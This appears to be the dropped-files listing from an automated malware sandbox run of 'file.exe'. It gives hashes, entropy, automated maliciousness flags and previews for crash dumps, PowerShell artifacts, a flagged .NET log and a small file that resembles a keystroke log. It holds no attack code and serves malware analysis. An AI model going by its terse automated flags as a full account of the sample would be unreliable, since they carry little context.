                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:42:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):217468
                                                                                        Entropy (8bit):3.920371364074599
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:tHTzFl1AxN74uEqy1WLTg4WsFL7xTtigeB+:tHtH8F4jeTghs9xn
                                                                                        MD5:D9B7984FD81D1A00889DB239C8A2DBB6
                                                                                        SHA1:D607AA47D3D30AE3D27B8F4BD4C826B5A2CED011
                                                                                        SHA-256:961A6E4A2B19A5FBD58259105C04565D7AC85B1B690E10CEE6D9DB7B1C2C02B0
                                                                                        SHA-512:5C27F050435691CD673B4CBCD715BA9EA2A7FFA9F7788C149166A84B0E052ABDCADCB3838E4DDFE7B22717E6FFE3D3042264267E074603F2760FA591842CA20C
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.6889699841648307
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJyPb6A46YEfnSURgmfZ//MIrpDG89bKbssfEGOEjm:R6lXJCb6H6YEvSURgmfx/NKb/fE26
                                                                                        MD5:80E707A231AF5C8261E896326B456DB5
                                                                                        SHA1:192A5208F193917D0B047090B552B839820DA9C1
                                                                                        SHA-256:8C3F066AD66B6DE4082A5D6C3D0E5D89CC4D7A286EB1114AC7DC53C58E83F087
                                                                                        SHA-512:AEA363B195DEF026835DD3480892E17EA24B1BD28E5C8BAEE8A04C7099BB89848DCD0ECAE31A6DB3EC9BE30AE6F2DC5788B89CB01AAF230443345943C6BB80EB
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>19045</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString><Revision>2006</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>2057</LCID></OSVersionInformation><ProcessInformation><Pid>5688</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.479024748407362
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZUJg77aI9LAWpW8VYvYm8M4Ju/7PFj+q8vc/77+uvC/KBJg2uNd:uIjfAI7V57VXJwKxuvLg2md
                                                                                        MD5:14A704E7AF641C7D401805CBC122A5C6
                                                                                        SHA1:5267196D22C9598B9B74C9A3126399D2C72EF7DF
                                                                                        SHA-256:3D8511D3489E201ACE99F5E053CEAE3F25FBEA02F902C8AB0E68139CC448C47E
                                                                                        SHA-512:D6A2158226B1126FCB576CFC2FAD29105FC3B1B25DE4262D3431F2897C96D6FFB2274AD0137DD72872D61FA4907B0B16778E8BBB80647F152E2E0E5B97569DF6
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618344" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:20 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220622
                                                                                        Entropy (8bit):3.8824151316534037
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:cGOFn462I74uEq5XLTgscXEcP9ii4+BvWCRz:cGe4YTgDX1t4M
                                                                                        MD5:D9E3F65CFD0C6181318EB6B44FD06CA0
                                                                                        SHA1:25E45A034D7C4B16988C761AA5594F0FE6FA91CE
                                                                                        SHA-256:7DB40E05C3B7A63B8EF453B170C0279BA59063F0AB4AD2E8143E2A7431E040F9
                                                                                        SHA-512:F0FBFBA1670DC91AADF85BA32BBB2D30FDBD0E0B55554270F6BF8487434C060652D7E8C5FF237C595D2E3FBDD9A452E757D972303857E931332EF19F77A03482
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8360
                                                                                        Entropy (8bit):3.689606187196721
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJuCJh6BJ6Y9hSU9wZ7WgmfZDF/MIrpDH89bvUsfSFm:R6lXJbh6BJ6YbSU9M7Wgmf//6vHfZ
                                                                                        MD5:67CE5400D7CF79A851C3224E52A7E887
                                                                                        SHA1:A3D3F017981BF134DE286E7E02DCE477DE3FB350
                                                                                        SHA-256:F153C89E6E3173FAA74CC8025D7887F6C341D714C868FC2FD45A52C66EE9AA4D
                                                                                        SHA-512:9A0600442219125A6AC4E7B75450EC132DB08626A5D0E0414FFDE3749E56AD4C7A47DD87A5414799A9CAC41647B20D680C65044942D36E8E23C13AA39A232DE0
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>19045</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString><Revision>2006</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>2057</LCID></OSVersionInformation><ProcessInformation><Pid>5780</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4710
                                                                                        Entropy (8bit):4.441791627178954
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYNbYm8M4Ja/7PFqW+q8v2/7b26/ErXNd:uIjfdI7V57Vk+JWKSmr9d
                                                                                        MD5:0B911E63E928C7CF99D07807C938FBA4
                                                                                        SHA1:24F00368A3A4CA8FBC5B77257A54314C3B6920F0
                                                                                        SHA-256:D961CC6D5BEA1B5A56827DA83E1811B83106195F2A500724185B1F6636CFE3D8
                                                                                        SHA-512:A65A86660E4CA172EEA5156942E8955A94D56CCC6F48A9E73B18E7A0A6314B61560068A8C178BA842024D210F2461AD63FEB5778684DF783ACA1CBCC56D06F3E
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:29 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):216952
                                                                                        Entropy (8bit):3.8832602512021643
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:Pz1L+g1zXL/8AGli0tTQ7D+BpN4uE2aOLNVHylLTgXmuwuBojR/LHJmF81LOCD32:L15rmR8it4uEq7ylLTgXmlLJmK5N3SV
                                                                                        MD5:3BABD344015031AF1BF4CE00E82086F8
                                                                                        SHA1:8744D63EFA2843F55B45AA0240D43EAD7B9F707D
                                                                                        SHA-256:7BB3AFDCC7C6C5B9F6ADCE97F05CCCF0812041F74D177F194AEF52512D5FB976
                                                                                        SHA-512:519FA6C8334D74601587B9025EC8634F8141412D52F5C2FDA0FF484D8C961C66A76E5D9FA7605D61F6714A7DB053EF070056D70210924AC906F5305934A907E5
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8360
                                                                                        Entropy (8bit):3.6876184223313566
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJjCo6E06Y9CSU9IZx6wgmfZDF/MIrpDT89beRsfoqm:R6lXJx616YISU9kowgmf//GeKf0
                                                                                        MD5:119B3C54CCB0057B8A59847118E36E8A
                                                                                        SHA1:D423DD0E5D61653005ED80C7951D60F1D3E5B0BA
                                                                                        SHA-256:95CA73850357B37EA2504BDE86476AF708A55D4AC3599B6D60A547BEDFDBCBF6
                                                                                        SHA-512:D9D1B955E33D4202C7BE0A707E6368991ECCA19903CBAAD52BCE332D167B7CE8D94016E1BF59CEFD27297A09F0427C44B99BF13675C009B54B99DFEA8AB7D4B6
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>19045</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString><Revision>2006</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>2057</LCID></OSVersionInformation><ProcessInformation><Pid>3020</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4710
                                                                                        Entropy (8bit):4.443963422237909
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYHYm8M4Ja/7PFOo+q8v2/71J26/ErLNd:uIjfdI7V57VHJyKymrZd
                                                                                        MD5:4C71C0D38E55B324E35D3C1F425968AE
                                                                                        SHA1:295130B9FD14E3834B7ECDED61548B839F15DB0C
                                                                                        SHA-256:69E1728530B1AE118D2E0C7BA08CB5E25ED56D7068852AE15C7D099247906BED
                                                                                        SHA-512:008BD79DC0923047597BD6615516AC0C06DDA78BEA5EF89A31DD08BB07FAB88AC4FF06C13FB938F1852159F0A9F4E855C55BB8FFA08ED10565E82B03AFEAFD21
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:39 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):214612
                                                                                        Entropy (8bit):3.7323996584608645
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:ALqJ7jfATcM4uEq9VLTgCSU4QE3GjqcTV:AeJficM46BTgCSZbO9
                                                                                        MD5:D4812C08F3FBF0E2648B8B70391307C7
                                                                                        SHA1:F5CEB7895C30BCE3C2209220EF2FD54385B30683
                                                                                        SHA-256:366F27EB9E105B0BF39F1A367E7A82E68B6E173A4E5037B0069AA3ECEA44E5FC
                                                                                        SHA-512:C87B173F4A999F36FE6564B07F60D8050582A31251D176B67EBEBF3FCBD7FDEFD4E7D2408546142A833001BE9AC3419FAD275F6667392B8F001B70187851FCE8
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg........................`...(.......<............ ..jJ..........`.......8...........T...............T........................!..............................................................................eJ......H"......GenuineIntel............T.......H.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.6879435249604096
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJpNk67Ao6YEf3SUrgmfZ//MIrpDa89bPBsfKlm:R6lXJpO67Ao6YEPSUrgmfx/BP6fx
                                                                                        MD5:25ABAB02849E9DA99FA8711A91A4C022
                                                                                        SHA1:F8189816FE1BFF8AF954FFD53180A1A78567DCAD
                                                                                        SHA-256:632201C42CE4365A27D399126A6C48B7E0D72F4D6640B6888D4D86752A41EE77
                                                                                        SHA-512:CFC35ED6D08B899728AB32B313EA8923ED3EC84B718EDDDE7900544949232E3E2D68BDBA457094193438A1809A8E0F79E311E1619CEE4EDDEB875B8D890DBE4E
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.0.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.476789336443529
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VY/Ym8M4Ju/7PFeE5+q8vc/7huvC/KBJg2oNd:uIjfdI7V57VnJk5KmuvLg2kd
                                                                                        MD5:FBC8CAB8685A7D80FBA8E622B2F96A9D
                                                                                        SHA1:70E1F5F9EE92C6505D672BF5BF967B8EB5BD3897
                                                                                        SHA-256:06509142679B68E2C1DABF52589098ABC25DCC2657234024FB2590158DF37601
                                                                                        SHA-512:B558F34EC9E19E2A868B30699054784FD1EAFF600468F81B9DA4D814A904206E52E9B0A484642CF508246D59E1B7200CC37141FB3A65A9EC0435C5E72F72F1F4
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):642
                                                                                        Entropy (8bit):5.345222650979019
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZaOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKtKDE4KhKiKhk
                                                                                        MD5:5A42AAF6EED5DE763D78B81161E562E5
                                                                                        SHA1:0BC3C9744F480E22AD27C7B9BEC85CB63C757CE0
                                                                                        SHA-256:54062224FE33D8E74A490BA90BC259AFB569F4867AC1946C722B22F7550D64BB
                                                                                        SHA-512:877BA9FA0B49D9D71818C6F94C86F215D9322CA4694CA37B2DE0592B89C4A98E44DEEA9DBF78F3AF6512C5403F0B6EF9035ECB9627C091383D3E899ADAB62D4A
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):2232
                                                                                        Entropy (8bit):5.38001807625381
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZcvUyus:jLHyIFKL3IZ2KRH9OugQs
                                                                                        MD5:15A37A4026B58AF7B5B3AD00D9059D4E
                                                                                        SHA1:404F66EDC3AC45EF497F5A7B4691AC69CC2305B4
                                                                                        SHA-256:B1D1BA4774A144D850128F604B1926641AC829C9FFB9B7D648C863078BAD62A8
                                                                                        SHA-512:E886E1B9A6F6A2693B8D24390DB9DB569FDD5BF56BE6B63502B04C4F36B5D765CBC77AD30A240E2946B48B0E58D1243CC48D59BEAA808D82532A82E4DA9956B7
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:Generic INItialization configuration [WIN]
                                                                                        Category:modified
                                                                                        Size (bytes):58
                                                                                        Entropy (8bit):3.598349098128234
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                                        MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                                        SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                                        SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                                        SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
